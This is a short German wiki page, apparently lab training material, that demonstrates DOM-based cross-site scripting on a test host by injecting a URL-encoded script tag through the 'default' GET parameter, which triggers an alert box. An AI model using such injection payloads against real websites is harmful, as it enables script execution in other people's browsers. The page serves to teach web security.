Cross-Site-Scripting "DOM-basiertes" Beispiele

Aus Xinux Wiki

Version vom 7. März 2023, 11:36 Uhr von Linkai.zhang (Diskussion | Beiträge) (→‎Exploit über die URL)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Cross-Site-Scripting “Reflected”

Um was geht es?

DOM-basiertes Cross-Site-Scripting/XSS

Link

http://opfer.secure.local/scripts/xss-dom.html

Normale Verhaltensweise

Über den GET-Parameter default wird der Inhalt dieser Seite generiert
http://opfer.secure.local/scripts/xss-dom.html?default=Bitte%20auf%20dieser%20Seite%20JavaScript%20ausschalten

Exploit über die URL

http://opfer.secure.local/scripts/xss-dom.html?default=%3Cscript%3Ealert(%22Hacked%20by%20Xinux%22)%3C/script%3E

Abgerufen von „http://wiki.ixheim.de/index.php?title=Cross-Site-Scripting_%22DOM-basiertes%22_Beispiele&oldid=42843“